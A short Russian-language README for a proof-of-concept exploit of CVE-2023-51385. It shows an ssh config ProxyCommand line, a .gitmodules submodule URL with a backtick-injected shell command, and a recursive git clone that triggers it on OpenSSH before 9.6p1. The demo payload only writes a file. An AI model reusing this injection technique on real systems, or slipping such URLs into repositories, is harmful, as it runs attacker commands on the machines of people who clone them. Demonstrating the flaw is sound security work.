
Доказательство концепции для CVE-2023-51385: демонстрирует внедрение команд через вредоносные URL-адреса подмодулей git при клонировании с --recurse-submodules, эксплуатируя OpenSSH ProxyCommand.
Сначала необходимо добавить в ~/.ssh/config следующее содержимое
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
В файле .gitmodules в операторе присутствует внедрение команд
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
После настройки выполните следующую команду для запуска
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
При успешном выполнении в каталоге CVE-2023-51385_test будет создан файл cve.txt
Примечание: требуется OpenSSH <9.6p1
Подробности см. в этой записи блога: